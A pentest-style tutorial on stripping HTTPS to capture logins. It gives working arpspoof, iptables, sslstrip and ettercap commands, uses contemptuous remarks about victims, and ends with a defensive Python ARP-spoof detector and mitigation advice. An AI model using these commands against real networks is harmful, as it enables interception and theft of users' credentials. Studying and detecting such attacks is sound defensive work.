Intro
Ettercap was a very nice and easy way to sniff passwords, and it still is for the most part. A recent issue has been the fact that the popular browsers have made their warnings about SSL certificates a little more scary. The old warnings looked harmless: the sheep would just click yes and the wolf would then have access to their PayPal account. The newer warnings are a little more scary, but from what I’ve seen they aren’t much of a deterrent to the clicktards out there; it will be rare that they know they’re being sniffed. When doing a pentest we want the passwords of the network administrators, not of the lowly sheep. Most network admins are at least a little security aware.
Problem: Newer versions of popular web browsers have better warnings for SSL certificate errors. This helps advanced users become aware that there may be a MITM attack going on. Most “clicktards” will ignore these warnings anyway and relinquish their logons to you, but we want network admin passwords in our pentest.
Solution: Use SSL Strip. This will strip off all SSL information and pass the page to the victim as HTTP rather than HTTPS, so there is no warning and only the most astute and paranoid users will notice.
My lab is as follows: BackTrack 4 Live and a Windows XP machine, which will be my victim.
Here is what I did step by step in BT4 Live boot to get this to work.
1. Start networking on BT4
/etc/init.d/networking start
2. Enable IPv4 forwarding
echo "1" > /proc/sys/net/ipv4/ip_forward
3. Create an iptables rule to forward traffic destined for port 80 to the port used by sslstrip, which is 10000 by default
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
4. Now we need to start arpspoof to poison the victim's ARP table
arpspoof -i eth0 -t <Victims IP Address> <The Gateways IP Address>
5. Now we start sslstrip with the -a switch
sslstrip -a
6. Next we need to start ettercap
ettercap -T -q -i eth0
7. wait for someone to logon and grab their password!!
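The ARP poisoning in step 4 is also the part of this setup that a defender can see most easily on the wire: the gateway's IP suddenly resolves to a different MAC, and one MAC starts answering for several IPs. The following detector is an added example, not code from the original post; it runs over constructed tcpdump-style ARP reply lines (the addresses are made up) and flags both signs.

```python
import re
from collections import defaultdict

# Matches tcpdump-style ARP reply lines such as
# "12:00:01.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28"
ARP_REPLY = re.compile(
    r"ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)

# Constructed sample capture (not real traffic). The first three replies are
# normal; in the last two a third host (00:16:3e:aa:bb:cc) starts answering
# for both the gateway (.1) and the client (.50), the pattern a bridging MITM leaves.
SAMPLE_LINES = """\
12:00:01.000 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
12:00:02.000 ARP, Reply 192.168.1.50 is-at 00:aa:bb:cc:dd:ee, length 28
12:00:03.000 ARP, Reply 192.168.1.10 is-at 00:16:3e:aa:bb:cc, length 28
12:00:05.000 ARP, Reply 192.168.1.1 is-at 00:16:3e:aa:bb:cc, length 28
12:00:06.000 ARP, Reply 192.168.1.50 is-at 00:16:3e:aa:bb:cc, length 28
""".splitlines()


def detect_arp_spoof(lines, gateway_ip=None):
    """Return a list of alert strings for (a) an IP whose MAC changes and
    (b) a MAC that grows to answer for more than one IP. Both are
    heuristics: routers and VM hosts legitimately own several IPs, so
    known multi-IP MACs should be allow-listed in a real deployment."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue
        ip, mac = m.group("ip"), m.group("mac").lower()
        prev = ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            tag = "GATEWAY " if ip == gateway_ip else ""
            alerts.append(f"{tag}MAC change for {ip}: {prev} -> {mac}")
        ip_to_mac[ip] = mac
        before = len(mac_to_ips[mac])
        mac_to_ips[mac].add(ip)
        if before >= 1 and len(mac_to_ips[mac]) > before:
            alerts.append(f"{mac} now claims {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_LINES, gateway_ip="192.168.1.1"):
        print(alert)
```

Static ARP entries for the gateway on sensitive hosts, or dynamic ARP inspection on the switch, remove the step-4 foothold altogether, so the detector is a second line rather than the fix.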